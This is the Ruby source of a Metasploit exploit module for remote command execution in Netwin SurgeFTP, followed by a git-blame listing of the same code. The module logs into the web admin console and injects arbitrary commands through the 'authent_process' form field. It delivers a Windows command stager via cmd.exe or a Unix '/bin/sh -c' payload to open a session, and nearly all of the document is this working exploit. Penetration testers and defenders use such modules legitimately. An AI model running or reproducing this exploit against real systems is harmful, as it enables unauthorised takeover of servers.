modules/exploits/multi/http/netwin_surgeftp_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Netwin SurgeFTP Remote Command Execution',
      'Description'    => %q{
          This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8
        or prior.  In order to execute commands via the FTP service, please note that
        you must have a valid credential to the web-based administrative console.
      },
      'Author'         =>
        [
          'Spencer McIntyre',  #Who found this vuln?
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '89105' ],
          [ 'EDB', '23522' ]
        ],
      'Platform'       => %w{ win unix },
      'Targets'        =>
        [
          [ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win', 'CmdStagerFlavor' => 'vbs'}  ],
          [ 'Unix',    { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ]
        ],
      'DisclosureDate' => '2012-12-06',
      'Notes'          =>
        {
          'Stability'   => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
        },
    ))

    register_options(
      [
        Opt::RPORT(7021),
        OptString.new('HttpUsername', [ true, 'The username with admin role to authenticate as', 'admin' ]),
        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'password' ])
      ])
  end

  def check
    res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'})
    if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def execute_command(cmd, opts)
    http_send_command("cmd.exe /q /c #{cmd}")
  end

  def http_send_command(command)
    res = send_request_cgi(
    {
      'uri'     => '/cgi/surgeftpmgr.cgi',
      'method'  => 'POST',
      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
      'vars_post' =>
        {
          'global_smtp' => "",
          'global_restart' => "",
          'global_style' => "",
          'global_bind' => "",
          'global_passive_ip' => "",
          'global_passive_match' => "",
          'global_logon_mode' => "",
          'global_log_host' => "",
          'global_login_error' => "",
          'global_adminip' => "",
          'global_total_users' => "",
          'global_con_perip' => "",
          'global_ssl' => "",
          'global_ssl_cipher_list' => "",
          'global_implicit_port' => "",
          'log_level' => "",
          'log_home' => "",
          'global_watcher_program_ul' => "",
          'global_watcher_program_dl' => "",
          'authent_process' => command,
          'authent_cmdopts' => "",
          'authent_number' => "",
          'authent_domain' => "",
          'global_strip_user_domain' => "",
          'global_noclass' => "",
          'global_anon_hammer_over_time' => "",
          'global_anon_hammer_max' => "",
          'global_anon_hammer_block_time' => "",
          'global_port' => "",
          'global_mgr_port' => "",
          'global_mgr_ssl_port' => "",
          'cmd_global_save.x' => "36",
          'cmd_global_save.y' => "8",
        }
    })

    if res and res.body =~ /401 Authorization failed/
      fail_with(Failure::NoAccess, "Unable to log in!")
    elsif not (res and res.code == 200)
      fail_with(Failure::Unknown, 'Failed to execute command.')
    end
  end

  def exploit
    case target['Platform']
    when 'win'
      print_status("#{rhost}:#{rport} - Sending command stager...")
      execute_cmdstager({:linemax=>500})

    when 'unix'
      print_status("#{rhost}:#{rport} - Sending payload...")
      http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|)
    end

    handler
  end
end
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`Rank = GoodRanking`

			`include Msf::Exploit::Remote::HttpClient`
Use One CMDStagermixin 2014-02-07 18:46:19 -06:00			`include Msf::Exploit::CmdStager`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Netwin SurgeFTP Remote Command Execution',`
			`'Description' => %q{`
			`This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8`
			`or prior. In order to execute commands via the FTP service, please note that`
			`you must have a valid credential to the web-based administrative console.`
			`},`
msftidy cleanup 2012-12-21 16:11:16 -06:00			`'Author' =>`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`[`
			`'Spencer McIntyre', #Who found this vuln?`
			`'sinn3r'`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
add osvdb ref 89105 2013-06-18 06:15:29 -05:00			`[ 'OSVDB', '89105' ],`
			`[ 'EDB', '23522' ]`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`],`
Bug #8419 - Added platform info missing on exploits 2013-10-08 22:41:50 -04:00			`'Platform' => %w{ win unix },`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`'Targets' =>`
			`[`
Allow quotes in CmdStagerFlavor metadata 2014-02-08 17:11:47 -06:00			`[ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win', 'CmdStagerFlavor' => 'vbs'} ],`
Make changes based on juan and egypt's feedback 2012-12-22 02:35:22 -06:00			`[ 'Unix', { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ]`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2012-12-06',`
Add applicable notes to my exploit modules 2018-10-27 20:54:14 -04:00			`'Notes' =>`
			`{`
			`'Stability' => [ CRASH_SAFE, ],`
			`'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],`
			`'Reliability' => [ REPEATABLE_SESSION, ],`
			`},`
			`))`
msftidy cleanup 2012-12-21 16:11:16 -06:00
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`register_options(`
			`[`
			`Opt::RPORT(7021),`
Missed the HTTPUSERNAME fix 2016-05-27 18:37:04 -05:00			`OptString.new('HttpUsername', [ true, 'The username with admin role to authenticate as', 'admin' ]),`
Correct casing - should be HttpUsername and HttpPassword 2016-05-27 18:31:54 -05:00			`OptString.new('HttpPassword', [ true, 'The password for the specified username', 'password' ])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Add a check 2012-12-21 16:23:31 -06:00			`end`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00
Add a check 2012-12-21 16:23:31 -06:00			`def check`
			`res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'})`
			`if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/`
			`return Exploit::CheckCode::Detected`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`end`

			`def execute_command(cmd, opts)`
			`http_send_command("cmd.exe /q /c #{cmd}")`
			`end`

			`def http_send_command(command)`
			`res = send_request_cgi(`
			`{`
			`'uri' => '/cgi/surgeftpmgr.cgi',`
			`'method' => 'POST',`
Missed the HTTPUSERNAME fix 2016-05-27 18:37:04 -05:00			`'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`'vars_post' =>`
			`{`
			`'global_smtp' => "",`
			`'global_restart' => "",`
			`'global_style' => "",`
			`'global_bind' => "",`
			`'global_passive_ip' => "",`
			`'global_passive_match' => "",`
			`'global_logon_mode' => "",`
			`'global_log_host' => "",`
			`'global_login_error' => "",`
			`'global_adminip' => "",`
			`'global_total_users' => "",`
			`'global_con_perip' => "",`
			`'global_ssl' => "",`
			`'global_ssl_cipher_list' => "",`
			`'global_implicit_port' => "",`
			`'log_level' => "",`
			`'log_home' => "",`
			`'global_watcher_program_ul' => "",`
			`'global_watcher_program_dl' => "",`
			`'authent_process' => command,`
			`'authent_cmdopts' => "",`
			`'authent_number' => "",`
			`'authent_domain' => "",`
			`'global_strip_user_domain' => "",`
			`'global_noclass' => "",`
			`'global_anon_hammer_over_time' => "",`
			`'global_anon_hammer_max' => "",`
			`'global_anon_hammer_block_time' => "",`
			`'global_port' => "",`
			`'global_mgr_port' => "",`
			`'global_mgr_ssl_port' => "",`
			`'cmd_global_save.x' => "36",`
			`'cmd_global_save.y' => "8",`
			`}`
			`})`

			`if res and res.body =~ /401 Authorization failed/`
Switch to Failure vs Exploit::Failure 2013-08-15 14:14:46 -05:00			`fail_with(Failure::NoAccess, "Unable to log in!")`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`elsif not (res and res.code == 200)`
Switch to Failure vs Exploit::Failure 2013-08-15 14:14:46 -05:00			`fail_with(Failure::Unknown, 'Failed to execute command.')`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`end`
			`end`

			`def exploit`
			`case target['Platform']`
			`when 'win'`
Make cmdstager flavor explicit or from info 2014-06-28 17:40:49 -04:00			`print_status("#{rhost}:#{rport} - Sending command stager...")`
Add Netwin SurgeFTP module 2012-12-21 16:10:27 -06:00			`execute_cmdstager({:linemax=>500})`

			`when 'unix'`
			`print_status("#{rhost}:#{rport} - Sending payload...")`
			`http_send_command(%Q\|/bin/sh -c "#{payload.encoded}"\|)`
			`end`

			`handler`
			`end`
add osvdb ref 89105 2013-06-18 06:15:29 -05:00			`end`